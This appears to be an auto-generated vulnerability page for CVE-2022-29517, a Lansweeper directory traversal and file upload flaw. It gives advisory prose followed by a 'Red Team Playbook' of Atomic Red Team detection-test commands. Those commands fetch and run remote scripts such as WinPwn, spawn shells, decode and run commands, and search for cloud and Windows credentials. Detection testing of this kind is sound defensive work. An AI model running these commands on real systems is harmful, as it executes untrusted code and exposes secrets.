CVE-2022-29517
Overview
This vulnerability is a directory traversal flaw rooted in insufficient validation of user-supplied input within the HelpdeskActions.aspx edittemplate functionality of Lansweeper 10.1.1.0. The flaw allows crafted HTTP requests to manipulate file paths, enabling unauthorized file uploads. The affected component is the web application endpoint responsible for handling template edits in the Helpdesk module.
Vulnerability Description
A directory traversal vulnerability exists in the HelpdeskActions.aspx edittemplate functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.
Impact
An attacker with low-level privileges can exploit this vulnerability to upload arbitrary files to the Lansweeper server without user interaction. This can lead to full compromise of the affected system, including remote code execution and data manipulation. Network access to the Lansweeper web interface is required, and the vulnerability has a high severity score (CVSS 9.9) with low attack complexity and no user interaction needed. The vulnerability impacts confidentiality, integrity, and availability of the system.
Solution
Lansweeper users should upgrade to a version later than 10.1.1.0 where this directory traversal issue is addressed. Detailed remediation instructions and patch information are available in the Talos Intelligence advisory TALOS-2022-1529 (https://talosintelligence.com/vulnerability_reports/TALOS-2022-1529). Applying the vendor-provided patch or update is the recommended mitigation to eliminate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A directory traversal vulnerability in the Lansweeper application version 10.1.1.0 allows attackers to manipulate file paths in a way that can lead to arbitrary file uploads. This issue arises within the HelpdeskActions.aspx edittemplate functionality, where insufficient validation of user input enables an attacker to craft a specially-designed HTTP request. By exploiting this flaw, an attacker can traverse the directory structure of the server, potentially gaining access to sensitive files or directories that should not be exposed. The lack of proper sanitization and validation of file paths is the root cause of this vulnerability, making it a significant concern for organizations using this version of Lansweeper.
Attack vectors for this vulnerability primarily involve sending crafted HTTP requests that exploit the directory traversal flaw. An attacker could utilize tools such as cURL or custom scripts to send requests that include path traversal sequences (e.g., "../") to navigate outside the intended directory. Once the attacker successfully uploads a malicious file, they could execute it to gain unauthorized access to the system, escalate privileges, or compromise sensitive data. Scenarios may include uploading web shells, which allow for remote command execution, or other malicious payloads that can further facilitate attacks within the network.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Lansweeper for IT asset management and helpdesk functionalities. Successful exploitation could lead to unauthorized access to sensitive information, including user credentials, configuration files, or proprietary data. The business risks associated with such a breach include financial losses, reputational damage, and potential legal ramifications due to non-compliance with data protection regulations. Furthermore, the presence of this vulnerability could serve as a foothold for attackers to launch further attacks within the organization's infrastructure, amplifying the overall risk.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating Lansweeper to the latest version is crucial, as vendors typically release patches to address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests that attempt to exploit directory traversal flaws. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively. Monitoring logs for unusual activity, such as unexpected file uploads or access attempts to sensitive directories, can further enhance detection capabilities.
In conclusion, the directory traversal vulnerability in Lansweeper presents a significant threat to organizations utilizing this software. The potential for arbitrary file uploads can lead to severe consequences, including unauthorized access to sensitive data and system compromise. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to detect and mitigate this vulnerability effectively. Implementing robust security measures and maintaining an ongoing commitment to security best practices will be essential in safeguarding against such vulnerabilities in the future.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Lansweeper | Lansweeper | 10.1.1.0 |
cpe:2.3:a:lansweeper:lansweeper:10.1.1.0:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-29517 |
| talosintelligence.com |
GitHub CVE
|
https://talosintelligence.com/vulnerability_reports/TALOS-2022-1529 |